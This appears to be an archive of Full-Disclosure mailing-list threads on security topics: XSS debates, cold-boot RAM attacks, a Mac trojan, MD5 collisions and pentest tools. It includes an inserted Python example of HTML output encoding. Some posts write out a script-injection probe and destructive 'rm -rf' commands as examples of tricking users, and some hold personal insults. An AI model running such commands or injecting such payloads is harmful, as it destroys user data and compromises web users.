Re: [Full-disclosure] Pentesting Distributions or Projects for Raspberry Pi
Hey, that's nice dude :) Thanks for the link!

~Jay

On Thu, May 23, 2013 at 6:34 AM, Carlos Pantelides carlos_panteli...@yahoo.com wrote:

> Jay:
>
> > Do you know other projects, distributions, and installer kits for Raspberry PI aside from the distributions and kits mentioned in this article: http://resources.infosecinstitute.com/pentesting-distributions-and-installer-kits-for-your-raspberry-pi/ ?
>
> Nice link. I've added a slight modification to w3af in order to turn on and off some LEDs and give feedback in a headless, uncontrolled scan scenario.
>
> http://seguridad-agile.blogspot.com/2013/05/w3af-on-raspberry-pi.html
>
> Carlos Pantelides
> @dev4sec
> http://seguridad-agile.blogspot.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Pentesting Distributions or Projects for Raspberry Pi
Hey there guys,

Do you know other projects, distributions, and installer kits for Raspberry PI aside from the distributions and kits mentioned in this article: http://resources.infosecinstitute.com/pentesting-distributions-and-installer-kits-for-your-raspberry-pi/ ? I am very much interested in trying out new projects :)

Also lately I have been addicted to RetroPie (https://github.com/petrockblog/RetroPie-Setup) ahahhaha, although it is not related to security really, but I just love emulating some cool and classic games from SNES.

Regards,
Jay Turla
http://resources.infosecinstitute.com/author/jay-turla/
[Full-disclosure] 0day Vulnerability in VLC (this is my first release of the vuln anywhere)
If VLC media player is launched in QT mode and the user is on Windows NT (any version of Windows so far as tested) connected to the internet, there is a vulnerability in the handling of unicast packets. The proof of concept code is in development and should be ready for publishing within the next 2 weeks. More in-depth vulnerability information will be released with the proof of concept.

This is a joint effort (the POC (proof of concept) code and vuln discovery) by 2 security firms: 4sData IT solutions and another firm that would like to remain nameless for the time being.

This vulnerability exposes almost everyone using VLC media player (unless on Linux systems, and that's just because of the lack of testing so far; they may still be found to be exposed).

Thank you for your time, and if interested please respond and let me know.

- Jay @ 4sData-IT-Solutions (www.4sdata.com - coming soon)

P.S. Launching 4sData this week to coincide with the VLC vuln.
Re: [Full-disclosure] agile hacking?
Ummm, you two both have each other's personal emails, so why don't you flame each other in private? The question to each is: do you feel that your comments to each other further this list and knowledge, or hurt it? This is FD, not "my pee pee is bigger than yours"... These words are just consuming energies that could be better served hacking the [EMAIL PROTECTED] out of something.

Jay

- Original Message -
From: Petko D. Petkov [mailto:[EMAIL PROTECTED]
To: [EMAIL PROTECTED],full-disclosure@lists.grok.org.uk
Sent: Wed, 19 Mar 2008 11:08:31 +
Subject: Re: [Full-disclosure] agile hacking?

> reepex, you are the only one backing up troth, read on all comments... I don't bash people. I encourage them, and this is present in all my work and the work behind the GNUCITIZEN umbrella. Not I, but the crowd hanged him, as well they will hang you for your arrogant, egocentric, foolish and rather juvenile behavior. I personally don't care about you, nor do I care if you like the work on GNUCITIZEN or even my work.
>
> In my eyes and the eyes of others you follow a very basic parasitic social pattern: making a name for yourself not based on your knowledge but based on your arrogant, bottomless comments. You don't lead by example! You are a parasite, a vampire, sucking blood and energy from those around you. I hardly doubt that anyone can consider you as a friend or even appreciate your skills and knowledge when you are nothing more but a vulture.
>
> Comparing the Agile Hacking project with books such as How to Own a Continent (by FX, Paul Craig, Joe Grand, and Tim Mullen...), How to Own the Box (by Ryan Russell, Ido Dubrawsky, FX, and Joe Grand...), How to Own a Shadow (by Johnny Long, Tim Mullen, and Ryan Russell...), The Art of Intrusion (by Kevin D. Mitnick, and William L. Simon..) and the Hacking Exposed series (by some of the most recognized information security experts such as, but not only, Johnny Cache, Chris Davis, Stuart McClure, Joel Scambray, Andrew Vladimirov, Brian Hatch, David Endler...), is nothing but a flattering comment. I hope that this project achieves and even supersedes their success. These are some of my favorite books and I have great respect for their authors.
>
> You and all others who support your dying cause and who have repeatedly attacked what we have built from scratch with far too many sacrifices can laugh now, but the simple fact is that you will never even come close to what we have already achieved and given to this community. You and all other Full-disclosure trolls proved to be untrustworthy, unworthy even creatures. I hope that your real identities stay well hidden behind your nicknames, as I highly doubt that you will succeed in life. If I were in your place I would have reconsidered my values. Your and the other trolls' comments are not satire but idiocracy, as a fellow GNUCITIZEN reader has pointed out.
>
> Kind Regards,
> pdp
> founder of GNUCITIZEN, information security research, penetration tester, life hacker, co-author of two best-selling books, author of numerous printed publications and online media outlets, active speaker and opinion former, hacker culture evangelist, founder of Hakiri, entrepreneur, lecturer, etc... I am far behind the people I look after for inspiration and guidance but I am well ahead of you.
>
> On Wed, Mar 19, 2008 at 8:35 AM, reepex [EMAIL PROTECTED] wrote:
>
> > so no one respects me, i bash people's projects, etc... whatever. You still do not explain why you have the attitude that anyone who does not like your work or ideas is a talentless troll that you can brush off.
> >
> > On Wed, Mar 19, 2008 at 2:40 AM, Petko D. Petkov [EMAIL PROTECTED] wrote:
> >
> > > Dear Reepex,
> > >
> > > Unfortunately, you've already lost all the respect of a larger portion of people on this mailing list as well as outside of it. You have never led by example but by bashing people on what they try to accomplish. Everyone who has been in this industry/lifestyle for long enough knows that they don't know everything. In fact, as the saying goes: A wise man never knows all, only fools know everything.
> > >
> > > My advice to you is to stop pretending to be someone and be who you are. If you think that this project is crap then help to make it better. Everyone that has ever written a book knows how hard it is to put everything together and how frustrating it is to want to put in the things that you want and not have the chance to do so. It is easier to say what is crap but 100x harder to do it right. Also, it is very easy to take people apart from what they have accomplished, I've done it myself: http://www.gnucitizen.org/blog/hamster-plus-hotspot-equals-web-20-meltdown-not/ but 100 times harder to put yourself in their shoes: http://www.gnucitizen.org/blog/reconsidering-the-side-jacking-attack/
> > >
> > > Again, lead by example, not by baseless comments.
> > >
> > > Regards,
> > > pdp
> > >
> > > On Wed, Mar 19, 2008 at 3:59 AM, Nate McFeters [EMAIL PROTECTED] wrote:
> > >
> > > > Ok, I'll buy
[Full-disclosure] IE8 beta is available - Challenge
Who can be the one to find and publish the first exploit?

http://www.microsoft.com/windows/products/winfamily/ie/ie8/readiness/Install.htm

Jay
Re: [Full-disclosure] round and round they go
I would think a more realistic scenario might be a person working at an airport shutting their system down and then getting it stolen, vs. a forensic examiner yanking the cord on purpose. Just an observation.

- Original Message -
From: matthew wollenweber [mailto:[EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Fri, 22 Feb 2008 09:57:55 -0500
Subject: Re: [Full-disclosure] round and round they go

> I found the article interesting, but I wonder about its practicality. If you have physical access to the box you never really need to power down the box in the first place, and generally if the box is already on, I think most people would prefer to attack a service to get on the system directly. But there are some special cases where these techniques will likely be very useful.
>
> For me, I've always disliked the practice of doing live forensic discovery. I'd much rather get a clean disk dump than poke around on the system first, but losing RAM sucks. Maybe now IR/Forensic guys can get the best of both worlds? They can yank the power to save the disk state and dump memory by using the techniques described in the article. :)
>
> On Fri, Feb 22, 2008 at 8:32 AM, niclas [EMAIL PROTECTED] wrote:
>
> > http://blog.wired.com/27bstroke6/2008/02/researchers-dis.html
> > (cooling down DRAMs keeps their contents for a longer time, even during reboot.)
> >
> > well, this shows how important mechanical security still is, even with all the crypto-stuff out there. if you e.g. just *glued* your RAM modules into your motherboard, the option left would be booting a malicious OS. a BIOS-password might put delays on that. so, if it is really secret put your PC in a locked steel box!
> >
> > as a direct countermeasure you might as well consider a simple temperature sensor next to your DRAMs, releasing [evil self-destruction hack] when temperatures drop below 0°C. thermite does a good job on destroying HDDs but it's very dangerous. it's probably more easy to use this device then: http://www.wiebetech.com/products/HotPlug.php
> >
> > looking at these two methods, i notice how they (whoever) seem to aim not only on physical access but also more and more on surprising the crypto-user. they might use the methods mentioned above or just hit you with a flashbang, so you can't press the lock key anymore. this worries me more than any it-related security flaw. i don't want the police to behave like that.
> >
> > n.
>
> --
> Matthew Wollenweber
> [EMAIL PROTECTED] | [EMAIL PROTECTED]
> www.cyberwart.com
Re: [Full-disclosure] round and round they go
hrm. sigh. Normal moles not being able to grasp trivial knowledge. Airports are, duh, known conduits of business travellers with lots of data, thus increasing the possibility of targeting a more valuable target. So your statement that only ordinary criminals steal at airports is shortsighted. If anything, a common criminal isn't going to try and steal at a place with a fucking million security cameras around. You obviously don't have enough of a grasp of the techniques to understand this thread, so drop back off. You hardly need a barrel of liquid nitrogen - if you could summon not a barrel but more of a can of clue you would be better off.

Jay

- Original Message -
From: niclas [mailto:[EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Cc: [EMAIL PROTECTED],[EMAIL PROTECTED]
Sent: Sat, 23 Feb 2008 01:16:48 +0100
Subject: Re: [Full-disclosure] round and round they go

> > I would think a more realistic scenario might be a person working at an airport shutting their system down and then getting it stolen, vs. a forensic examiner yanking the cord on purpose. Just an observation.
>
> if somebody steals your notebook at the airport the chance of this person just being an ordinary criminal not interested in your data is very high. and if you just shut down your notebook, the DRAMs are still warm, decreasing the time window for an ice-spray-attack. so, unless the notebook is thrown into a barrel of liquid nitrogen...
>
> n.
[Full-disclosure] [ NNSquad ] Verizon's access via their provided Actiontec MoCa router (fwd)
-- Forwarded message --
Date: Fri, 08 Feb 2008 16:04:00 -0500
From: Andrew C Burnette [EMAIL PROTECTED]
To: [EMAIL PROTECTED] [EMAIL PROTECTED]
Subject: [ NNSquad ] Verizon's access via their provided Actiontec MoCa router

Hey folks,

In discussion with Lauren (off list) I recalled the following info that might be of interest to any FIOS users who actually want their home network to be a bit more secure.

During a recent UPS battery swapout, I got stuck with a Verizon 'dead' DHCP lease (it would not lease me an IP address). VZ Tech support was able to access and verify the configuration, code rev, and connectivity on the Actiontec router, despite there being no visible external IP address (according to my web view on the box) on the router. To me, that equals no security if they (unknown they...) can access my LAN or router without even their router logs showing such external access. Not good.

Anyway, in bridge mode, I run a software firewall behind it, which does the actual DHCP request and is my external visible IP to the world. You can still do all the normal stuff, using the Actiontec as a MoCa to Ethernet interface (NIM).

Best regards,
Andy Burnette
Re: [Full-disclosure] on xss and its technical merit
Saying XSS isn't a vulnerability is like saying a binary that has a buffer overflow isn't vulnerable. XSS needs JavaScript; a binary needs its own malcode as well. Every vulnerability needs a medium to be exploited. Naysayers of XSS want some elegant, exciting actions. It's not. It's a case of not sanitizing input that allows arbitrary code to be executed. Simple things like, umm, secure coding, URLScan, mod_security, NoScript could combat this easily.

It's like someone walking past a car and seeing a million dollars sitting in the front seat. Thief opens unlocked door and takes money. Now a more elegant way would be to manipulate the chemical composition of the glass back to a gaseous form and reach through. Either way the loot is gone.

I really don't understand why some in this community are so quick to say this is no find, this isn't new, this is insert blah. I guess it makes them feel intellectually superior to tear down the ideas of others whether they deserve it or not. In some cases they do. Are members of this community so starved for their own self worth that they strive to squash the ideas of others instinctively? Would make for an interesting study.

Jay
<script>alert('YAY!')</script>

- Original Message -
From: Fredrick Diggle [mailto:[EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Wed, 12 Dec 2007 13:17:18 -0600
Subject: Re: [Full-disclosure] on xss and its technical merit

> Thank you info sec guru for your glowing review. Did you even read my post? I think I explained quite succinctly why XSS is not a vulnerability. Do you have some argument with what I posted or are you going to stick with criticizing my tone? You win oh guru of the info sec industry thing.
>
> 3 fredrick YAY!
>
> On Dec 12, 2007 12:57 PM, Jay [EMAIL PROTECTED] wrote:
>
> > It's amazing the last 2 posters even have time to read FD, with all the super important super secret projects they must be working on. They preface everything with "I'm not going to put much thought into this" then proceed to vomit a bunch of useless rhetoric, throwing in how trivial it is and how much experience they have beating up 10 year olds or something.
> >
> > I actually think this thread should die, as 1 side of the house believes XSS and XSRF are viable attack vectors. The other side thinks it's rubbish. So let it die and then all the folks who are so bored (yawn) with XSS and CSRF can post their remarkable works and amaze us all.
> >
> > Jay
> >
> > - Original Message -
> > From: Fredrick Diggle [mailto:[EMAIL PROTECTED]
> > To: full-disclosure@lists.grok.org.uk
> > Sent: Wed, 12 Dec 2007 12:21:14 -0600
> > Subject: Re: [Full-disclosure] on xss and its technical merit
> >
> > > What no one seems to realize is that XSS by its very nature is not a vulnerability. It is a perfectly valid mechanism to aid in exploitation, but can anyone cite me an example where xss in and of itself accomplishes anything? I can think of pretty much 3 examples of XSS (granted without giving it much thought because let's face it, it isn't worth much thought)
> > >
> > > 1. You are taking something from a user which is accessible from the scripting language context of their browser. In this case the vulnerability is not XSS; the vulnerability is either that you (or the web browser) are storing something valuable in an insecure way. The most obvious example of this is something like session cookies which, if your auth/session management is implemented in a secure way, won't matter a bit. It follows that the vulnerability is not XSS but instead that some developer stored something valuable in a stupid way. All of the retards on the list will no doubt ask me for a secure session management schema but I am a firm believer that sharing is communism so screw you.
> > >
> > > 2. You are forcing the user's browser to make a request and complete some task within the context of the application. In this case again the vulnerability is not XSS but instead that the application allows users to do important things without verifying who they are. This is request forgery, not xss; xss is only the mechanism by which the exploit is carried out. So again xss is not a vulnerability.
> > >
> > > 3. You are doing some other funkiness through the scripting language (all that crap about internal network scanning comes to mind). AGAIN this is not a vulnerability. If it is possible to do this crap through xss then it is also possible through any website the user visits. That means that if this crap is doable then you should report it to the guys who develop the scripting language backend and not some guy who doesn't sanitize things that he outputs. So once more the vulnerability is NOT xss, it is an issue with the scripting language.
> > >
> > > The only other case that you could make for this is ui defacement I guess, but in that case the vuln is not xss but that the developer didn't properly separate user generated content from backend content to make it clear that the content in these areas
Re: [Full-disclosure] on xss and its technical merit
I would say that XSS or CSRF is a means to an end. It's not that you can XSS, it's what you do with it once you find it. It's not a sexy beast that you can blog about, but it's an attack vector nonetheless. The simpler the attack, the greater the success. So yeah, it takes little skill to find. It takes equally little skill to securely code the app to sanitize in the first place. If an app is vuln to XSS, chances are the rest of the app is crap anyways...

Jay

- Original Message -
From: Byron Sonne [mailto:[EMAIL PROTECTED]
To: [EMAIL PROTECTED],full-disclosure@lists.grok.org.uk
Sent: Wed, 12 Dec 2007 09:48:07 -0500
Subject: Re: [Full-disclosure] on xss and its technical merit

> coderman wrote:
>
> > so perhaps "xss should be discussed much less" is the only concrete thing we all agree on?
>
> FTW
>
> It's pretty obvious that finding XSS has a low entrance barrier; this explains its popularity. It's just not very impressive. At the same time, if finding an xss gets some kid interested in security, then I suppose it can't be all bad.
>
> In any case, wikipedia has something interesting on this. I never thought about how to categorize them, but then again, I usually start vomiting from boredom at the mere sight of the word 'xss' in a subject line. From http://en.wikipedia.org/wiki/Xss, take it as you will:
>
> Type 0
> This form of XSS vulnerability has been referred to as DOM-based or Local cross-site scripting, and while it is not new by any means, a recent paper (DOM-Based cross-site scripting) does a good job of defining its characteristics. With Type 0 cross-site scripting vulnerabilities, the problem exists within a page's client-side script itself.
>
> Type 1
> This kind of cross-site scripting hole is also referred to as a non-persistent or reflected vulnerability, and is by far the most common type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page.
>
> Type 2
> This type of XSS vulnerability is also referred to as a stored or persistent or second-order vulnerability, and it allows the most powerful kinds of attacks. It is frequently referred to as HTML injection. A type 2 XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, filesystem, or other location), and later displayed to users in a web page without being encoded using HTML entities.
>
> Cheers,
> B
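The Type 1 / Type 2 distinction quoted from Wikipedia above comes down to one step: the point where client-supplied data is written into the page without HTML encoding. The following Python model is an added example, not code from this thread or from any of the posters; the tiny "search page", the comment store, the sample input and the check helper are all constructed here. It renders the same data two ways for each type (reflected and stored) so the effect of encoding at output time is visible, and it shows why encoding belongs at render time rather than at storage time.

```python
# Added example (not from the thread): where Type 1 and Type 2 XSS go wrong,
# and the output-encoding fix. Everything here is constructed for the
# example; the "app" and its data are hypothetical.
import html
import re

# Constructed client-supplied input containing markup (same sort of string
# as the <script>alert('YAY!')</script> signature seen in this thread).
SAMPLE_INPUT = "<script>alert('YAY!')</script>"


def render_search_unsafe(query: str) -> str:
    """Type 1 (reflected): request data echoed straight into the page."""
    return f"<h1>Results for {query}</h1>"


def render_search_safe(query: str) -> str:
    """Same page, but the data is HTML-encoded before it lands in the page.
    quote=True also encodes ' and " so the value is safe inside attributes."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


class CommentStore:
    """Type 2 (stored): data is persisted first and shown to other users later.
    The stored value is kept verbatim and encoded every time it is rendered;
    encoding at storage time would leave any other render path unprotected."""

    def __init__(self) -> None:
        self._comments: list[str] = []

    def add(self, text: str) -> None:
        self._comments.append(text)

    def render_unsafe(self) -> str:
        return "".join(f"<p>{c}</p>" for c in self._comments)

    def render_safe(self) -> str:
        return "".join(f"<p>{html.escape(c, quote=True)}</p>" for c in self._comments)


_SCRIPT_TAG = re.compile(r"<\s*/?\s*script", re.IGNORECASE)


def contains_live_script(page: str) -> bool:
    """Check used in the usage below: does the rendered page still carry a
    real <script> tag (as opposed to the inert &lt;script&gt; text)?"""
    return _SCRIPT_TAG.search(page) is not None


def attribute_context_safe(value: str) -> str:
    """Attribute context: quotes and ampersands in the value are encoded, so
    the value cannot terminate the quoted attribute it sits in."""
    return f'<input value="{html.escape(value, quote=True)}">'


if __name__ == "__main__":
    print(render_search_unsafe(SAMPLE_INPUT))  # the script tag reaches the browser
    print(render_search_safe(SAMPLE_INPUT))    # only the encoded text reaches it
    store = CommentStore()
    store.add(SAMPLE_INPUT)
    store.add("plain comment")
    print(store.render_unsafe())
    print(store.render_safe())
    print(attribute_context_safe('say "hi" & bye'))
```

The safe renderers never inspect the input for "bad" strings; they encode unconditionally at the point of output, which is the property the Type 1 and Type 2 definitions above are describing. Type 0 (DOM-based) is not modelled here because it happens entirely in the browser's own script, where the equivalent fix is writing untrusted data with a text-setting API rather than as markup.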
Re: [Full-disclosure] on xss and its technical merit
It's amazing the last 2 posters even have time to read FD, with all the super important super secret projects they must be working on. They preface everything with "I'm not going to put much thought into this" then proceed to vomit a bunch of useless rhetoric, throwing in how trivial it is and how much experience they have beating up 10 year olds or something.

I actually think this thread should die, as 1 side of the house believes XSS and XSRF are viable attack vectors. The other side thinks it's rubbish. So let it die and then all the folks who are so bored (yawn) with XSS and CSRF can post their remarkable works and amaze us all.

Jay

- Original Message -
From: Fredrick Diggle [mailto:[EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Wed, 12 Dec 2007 12:21:14 -0600
Subject: Re: [Full-disclosure] on xss and its technical merit

> What no one seems to realize is that XSS by its very nature is not a vulnerability. It is a perfectly valid mechanism to aid in exploitation, but can anyone cite me an example where xss in and of itself accomplishes anything? I can think of pretty much 3 examples of XSS (granted without giving it much thought because let's face it, it isn't worth much thought)
>
> 1. You are taking something from a user which is accessible from the scripting language context of their browser. In this case the vulnerability is not XSS; the vulnerability is either that you (or the web browser) are storing something valuable in an insecure way. The most obvious example of this is something like session cookies which, if your auth/session management is implemented in a secure way, won't matter a bit. It follows that the vulnerability is not XSS but instead that some developer stored something valuable in a stupid way. All of the retards on the list will no doubt ask me for a secure session management schema but I am a firm believer that sharing is communism so screw you.
>
> 2. You are forcing the user's browser to make a request and complete some task within the context of the application. In this case again the vulnerability is not XSS but instead that the application allows users to do important things without verifying who they are. This is request forgery, not xss; xss is only the mechanism by which the exploit is carried out. So again xss is not a vulnerability.
>
> 3. You are doing some other funkiness through the scripting language (all that crap about internal network scanning comes to mind). AGAIN this is not a vulnerability. If it is possible to do this crap through xss then it is also possible through any website the user visits. That means that if this crap is doable then you should report it to the guys who develop the scripting language backend and not some guy who doesn't sanitize things that he outputs. So once more the vulnerability is NOT xss, it is an issue with the scripting language.
>
> The only other case that you could make for this is ui defacement I guess, but in that case the vuln is not xss but that the developer didn't properly separate user generated content from backend content to make it clear that the content in these areas does not express the views of the site blah blah blah legal mumbo jumbo.
>
> XSS is however a perfectly viable mechanism to aid in exploitation. For example, let's say there is a command exec bug within an administrative interface of some app. You aren't able to exploit directly so you USE xss TO exploit indirectly. Saying that xss is a vulnerability is like saying that having a function pointer stored in memory is a vulnerability. Sure I can use it to take over your box if I can find a way to overwrite it, but try implementing anything without it.
>
> I honestly kind of like where that would go though, so let's take that to its logical conclusion. Everyone can get all upset every time they find an app that uses an object, and then someone can get rich off of a method to waste memory by putting canaries around every function pointer. It'll be fun and I'll never have to worry about finding a job. YAY!
>
> = Begin Drivel =
>
> > I would say that XSS or CSRF is a means to an end. It's not that you can XSS, it's what you do with it once you find it. It's not a sexy beast that you can blog about, but it's an attack vector nonetheless. The simpler the attack, the greater the success. So yeah, it takes little skill to find. It takes equally little skill to securely code the app to sanitize in the first place. If an app is vuln to XSS, chances are the rest of the app is crap anyways...
> >
> > Jay
> >
> > - Original Message -
> > From: Byron Sonne [mailto:blsonne_at_rogers.com]
> > To: coderman_at_gmail.com,full-disclosure_at_lists.grok.org.uk
> > Sent: Wed, 12 Dec 2007 09:48:07 -0500
> > Subject: Re: [Full-disclosure] on xss and its technical merit
> >
> > > coderman wrote:
> > > * so perhaps "xss should be discussed much less" is the only *
> > > * concrete thing we all agree on? *
> > >
> > > FTW
> > >
> > > It's pretty obvious that finding XSS has a low entrance barrier; this explains its popularity. It's just not very
[Full-disclosure] PlayStation 3 predicts next US president (fwd)
-- Forwarded message --
Date: Fri, 30 Nov 2007 05:29:35 +0100
From: Weger, B.M.M. de [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: PlayStation 3 predicts next US president

Hi all,

We (Marc Stevens, Arjen Lenstra and me) have used a Sony PlayStation 3 to correctly predict the outcome of the 2008 US presidential elections. See http://www.win.tue.nl/hashclash/Nostradamus if you want to know the details of what this has to do with cryptography.

We also announce two different Win32 executables that have identical MD5 hash values. This can be made to happen for any two executable files. This implies a vulnerability in software integrity protection and code signing schemes that still use MD5. See http://www.win.tue.nl/hashclash/SoftIntCodeSign for details.

Grtz,
Benne de Weger

- The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]
Re: [Full-disclosure] mac trojan in-the-wild
On Thu, 1 Nov 2007, Adam St. Onge [EMAIL PROTECTED] wrote:

> So if i put a picture of a naked girl on a website and said to see more you must open a terminal and enter rm -rf. Would we consider this a trojan...or just stupidity?

Yes, a Trojan. Yes, stupidity on the part of the designer of the home system. There should be no way to destroy so much user data by the user just typing six characters into a terminal window.

oo--JS.

> On 11/1/07, Alex Eckelberry [EMAIL PROTECTED] wrote:
>
> > > Let's not over-hype this-- while Apple's day has been coming, saying that users will be hit hard on something the user has to manually download, manually execute, and explicitly grant administrative privileges to is *way* over the top.
> >
> > The future of malware is going to be largely through social engineering. Does that mean we ignore every threat that comes out because it requires user interaction? Seems like whistling past the graveyard to me.
> >
> > Alex
> >
> > -Original Message-
> > From: Thor (Hammer of God) [mailto:[EMAIL PROTECTED]
> > Sent: Thursday, November 01, 2007 8:15 PM
> > To: Gadi Evron; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
> > Subject: RE: mac trojan in-the-wild
> >
> > > > For whoever didn't hear, there is a Macintosh trojan in-the-wild being dropped, infecting mac users. Yes, it is being done by a regular online gang--itw--it is not yet another proof of concept. The same gang infects Windows machines as well, just that now they also target macs.
> > > >
> > > > http://sunbeltblog.blogspot.com/2007/10/screenshot-of-new-mac-trojan.html
> > > > http://sunbeltblog.blogspot.com/2007/10/mackanapes-can-now-can-feel-pain-of.html
> > > >
> > > > This means one thing: Apple's day has finally come and Apple users are going to get hit hard. All those unpatched vulnerabilities from years past are going to bite them in the behind.
> > >
> > > Let's not over-hype this-- while Apple's day has been coming, saying that users will be hit hard on something the user has to manually download, manually execute, and explicitly grant administrative privileges to is *way* over the top.
> > >
> > > > I can sum it up in one sentence: OS X is the new Windows 98. Investing in security ONLY as a last resort loses money, but everyone has to learn it for themselves.
> > >
> > > Not the new Windows 98 by a long shot - saying that is just irresponsible. While Apple is not used to dealing with security in the same way that other companies are, comparing OSX to Windows 98 is not only a huge technical inaccuracy, but you also insult Mac users out there. OSX had UAC-like unprivileged user controls way before Vista did - let's not try to start some holy war on this like people have tried to do with Windows vs Linux in the past.
> > >
> > > If you want to report this, then report it-- but say what it is, a totally lame user-must-be-drunk exploit that requires that all manner of things go wrong before it works -- otherwise people will think that you've dressed up as Steve Gibson for Halloween.
> > >
> > > t
Re: [Full-disclosure] mac trojan in-the-wild
On Thu, 1 Nov 2007, Paul Schmehl [EMAIL PROTECTED] wrote:

> --On November 1, 2007 6:31:39 PM -0400 Adam St. Onge [EMAIL PROTECTED] wrote:
>
> > So if i put a picture of a naked girl on a website and said to see more you must open a terminal and enter rm -rf. Would we consider this a trojan...or just stupidity?
>
> I would consider it stupidity to think that that is comparable to a trojan.
>
> Paul Schmehl ([EMAIL PROTECTED])

I think, under the standard Unix system of permissions, this is a Trojan. Under the standard Unix system of permissions, every application running in my home directory can issue an 'rm -rf /home/me' and, without proper near-in-time backup, cause me much annoyance. The defect lies in the system of permissions. There exist systems of rolling off-machine backups and minimum privilege permissions systems, but they are not yet standard.

oo--JS.

> Senior Information Security Analyst
> The University of Texas at Dallas
> http://www.utdallas.edu/ir/security/
Re: [Full-disclosure] mac trojan in-the-wild
On Thu, 1 Nov 2007, Thor (Hammer of God) [EMAIL PROTECTED] wrote: That's an interesting figure (86% that is). Can you give us some insight into what you define as user interaction? If it is clicking a link or reading an HTML email, then OK. If it is opening an .exe from an email, I'd like to see what client you are talking about and what environment (meaning, what OS/email client and what did they have to do to get it to run). But specifically, how many were exploits where a user had to visit an untrusted site, download an executable, run it, and explicitly give it administrative credentials to run? Not just people running as administrator, but typing in the admin account credentials to run it as administrator as one has to do on OSX? My guess (and I'd really like to see details on your findings) is that most interactive issues are the more trivial interactive issues (like clicking a link and launching a vulnerable version of IE). But more importantly, let's look at things from the other side. Let's say I'm wrong, and that Gadi is right on target with his hit hard prediction and that we should be very concerned with this. Given the requirements here, that again being flagrant ignorance where all the above steps are executed (including the explicit admin part)-- what exactly are we supposed to do? If people are willing and able to go through the motions above what can we as security people do to prevent it? Far too many people in this industry are far too quick to point out how desperate the situation is at all turns, but I don't see many people offering real solutions. But you know, I have to say... 
If we are really going to consider this serious, and we are really going to define part of our jobs as being responsible for stopping people who have absolutely no concerns for what they do and are willing to enter their admin credentials into any box that asks for it, then I'd say that there is a *serious* misunderstanding about what security is, and what can be done about it-- either that, or I'm just in the wrong business. t Put in a better system of permissions. Use rolling backup. Have independent system activity watchers. These measures are just the first moves. Unix was not designed to be resistant to one million hostile actions per day by thousands of unknown attacking entities. But if you run standard Unix and you have a Net connection, that is what your Unix instance is exposed to. oo--JS.
Re: [Full-disclosure] mac trojan in-the-wild
On Thu, 1 Nov 2007, Paul Schmehl [EMAIL PROTECTED] wrote: --On November 1, 2007 10:14:50 PM -0400 Jay Sulzberger [EMAIL PROTECTED] wrote: On Thu, 1 Nov 2007, Paul Schmehl [EMAIL PROTECTED] wrote: --On November 1, 2007 6:31:39 PM -0400 Adam St. Onge [EMAIL PROTECTED] wrote: So if i put a picture of a naked girl on a website and said to see more you must open a terminal and enter rm -rf. Would we consider this a trojan...or just stupidity? I would consider it stupidity to think that that is comparable to a trojan. Paul Schmehl ([EMAIL PROTECTED]) I think, under the standard Unix system of permissions, this is a Trojan. Under the standard Unix system of permissions, every application running in my home directory can issue an 'rm -rf /home/me' and, without proper near in time backup, cause me much annoyance. The defect lies in the system of permissions. There exist systems of rolling off-machine backups and minimum privilege permissions systems, but they are not yet standard. Perhaps you don't understand what a trojan is. Its purpose is to take control of a machine to use it for purposes other than those to which its owner would put it and without the owners knowledge or permission. Destroying the machine is contrary to the design and purpose of a trojan. Paul Schmehl ([EMAIL PROTECTED]) If today, common usage of the word trojan in this context requires that the system continue to operate without alerting the legitimate user that the system has been compromised, then yes, my use of the word was wrong. But the Wikipedia article http://en.wikipedia.org/wiki/Trojan_horse_(computing) suggests that the Do 'rm -rf .' to see the pretty picture. Trojan satisfies the definition of Trojan (quoting http://en.wikipedia.org/wiki/Trojan_horse_(computing)): ... In the context of computing and software, a Trojan horse, often rendered without capitalization or simply as trojan, is a software which purports to do a certain type of action, but in fact, performs another. ...
... Types of Trojan horse payloads Trojan horse payloads are almost always designed to do various harmful things, but can also be harmless. They are broken down in classification based on how they breach and damage systems. The nine main types of Trojan horse payloads are: * Remote Access. * Email Sending * Data Destruction ... The thing I call a Trojan, and you do not, meets the first condition of the quote. And it seems to me to have a payload which commits Data Destruction. If I have used the word in a way tending to confusion, I apologize to all full-disclosurists. oo--JS. Senior Information Security Analyst The University of Texas at Dallas http://www.utdallas.edu/ir/security/
Re: [Full-disclosure] UNSUBSCRIBE
On Mon, 8 Oct 2007, Jones, Jeff (Enterprise Security) [EMAIL PROTECTED] wrote: UNSUBSCRIBE Jeffrey A. Jones http://crackmonkey.org/faq.html#QUESTION3 oo--JS. Constellation Energy Group, Engineering Forensics- Information Security Management (443) 394-2959 mailto: [EMAIL PROTECTED]
[Full-disclosure] [Discuss] Public comments are invited on GNSO Council's WHOIS reports and recommendations. (fwd)
